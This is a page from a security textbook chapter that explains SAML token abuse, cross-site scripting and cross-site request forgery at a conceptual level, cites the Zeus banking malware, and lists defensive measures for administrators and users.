364
Chapter 9
■
Security Vulnerabilities, Threats, and Countermeasures
SAML is an XML-based convention for the organization and exchange of communica-
tion authentication and authorization details between security domains, often over web
protocols. SAML is often used to provide a web-based SSO (single sign-on) solution. If an
attacker can falsify SAML communications or steal a visitor’s
access token, they may be
able to bypass authentication and gain unauthorized access to a site.
Cross-site scripting (XSS)
is a form of malicious code-injection attack in which an attacker
is able to compromise a web server and inject their own malicious code into the content sent
to other visitors. Hackers have discovered numerous and ingenious methods for injecting
malicious code into websites via Common Gateway Interface (CGI) scripts, web server soft-
ware vulnerabilities, SQL injection attacks, frame
exploitation, DNS redirects, cookie hijacks,
and many other forms of attack. A successful XSS attack can result in identity theft, credential
theft, data theft, financial losses, or the planting of remote-control software on visiting clients.
For the administrator of a website, defenses against XSS include maintaining a patched
web server, using web application firewalls, operating a host-based intrusion detection system
(HIDS), auditing for suspicious activity, and,
most important, performing server-side input vali-
dation for length, malicious content, and metacharacter filtering. As a web user, you can defend
against XSS by keeping your system patched, running antivirus software,
and avoiding non-
mainstream websites. There are add-ons for some web browsers, such as NoScript for Firefox
and uBlock Origin for Chrome, that allow only scripts of your choosing to be executed.
Cross-site request forgery (XSRF)
is an attack that is similar in nature to XSS. However,
with XSRF, the attack is focused on the visiting user’s web browser more than the web-
site being visited. The main purpose of XSRF is to trick the user or the user’s browser
into performing actions they had not intended or would not have authorized. This could
include logging out of a session,
uploading a site cookie, changing account information,
downloading account details, making a purchase, and so on. One form of XSRF infects a
victim’s system with malware that stays dormant until a specific website is visited. Then the
malware forges requests as the user in order to fool the web server and perform malicious
actions against the web server and/or the client.
One such example of an exploit that used XSRF is Zeus, which would hide on a victim’s
system until the user
visited their online bank site; then, after it checked their account bal-
ance and determined their bank account number, those details would be sent to the con-
trolling attacker, who would initiate an ACH money transfer to another bank. Thus, this is
an example of malware that assists in stealing money directly from the victim’s account.
Website administrators can implement prevention measures against XSRF by requiring
confirmations or reauthentication whenever a sensitive or risky action is requested by a
connected client. This could include requiring the
user to reenter their password, sending a
code to the user via text message or email that must be provided back to the website, trig-
gering a phone call–based verification, or solving a Completely Automated Public Turing
Test to Tell Computers and Humans Apart (CAPTCHA) (a mechanism to differentiate
between humans and software robots). Another potential protection mechanism is to add
a randomization string (called a
nonce
) to each URL request and session establishment and
to check the client HTTP request header referrer for spoofing.
End users can form more
secure habits, such as running anti-malware scanners; using an HIDS; running a firewall;
avoiding nonmainstream websites; always logging off from sites instead of closing the
browser, closing the tab, or moving on to another URL;
keeping browsers patched; and
clearing out temporary files and cached cookies regularly.
